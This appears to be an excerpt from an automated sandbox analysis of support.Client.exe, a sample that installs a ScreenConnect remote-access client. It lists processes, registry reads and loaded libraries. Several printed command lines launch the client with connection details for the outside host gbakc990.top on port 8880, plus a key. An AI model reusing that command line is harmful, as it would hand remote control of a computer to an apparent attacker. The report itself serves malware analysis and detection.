Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\support.Client.exe	Code function: 0_2_00ADA495	0_2_00ADA495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89AEF5	1_2_00007FFD9B89AEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A3311	1_2_00007FFD9B8A3311
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8BB1E2	1_2_00007FFD9B8BB1E2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A2850	1_2_00007FFD9B8A2850
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AD470	1_2_00007FFD9B8AD470
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89FA21	1_2_00007FFD9B89FA21
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A9879	1_2_00007FFD9B8A9879
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B2870	1_2_00007FFD9B8B2870
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B891211	1_2_00007FFD9B891211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B3101	1_2_00007FFD9B8B3101
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B896138	1_2_00007FFD9B896138
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8B10D7	9_2_00007FFD9B8B10D7
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8B10CF	9_2_00007FFD9B8B10CF
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC5834	9_2_00007FFD9BBC5834
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC5621	9_2_00007FFD9BBC5621
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBC62E9	9_2_00007FFD9BBC62E9

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7040 -ip 7040

Uses 32bit PE files

Source: support.Client.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal54.evad.winEXE@17/75@2/3

Source: C:\Users\user\Desktop\support.Client.exe

0_2_00AD1000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7040
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\support.Client.exe

Command line argument: dfshim

0_2_00AD1000

Source: support.Client.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\support.Client.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\support.Client.exe "C:\Users\user\Desktop\support.Client.exe"
Source: C:\Users\user\Desktop\support.Client.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe" "RunRole" "b56709e0-433a-4670-b1b3-7d84b1644fec" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7040 -ip 7040
Source: C:\Users\user\Desktop\support.Client.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 692
Source: C:\Users\user\Desktop\support.Client.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe" "RunRole" "b56709e0-433a-4670-b1b3-7d84b1644fec" "User"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7040 -ip 7040
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 692
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\support.Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
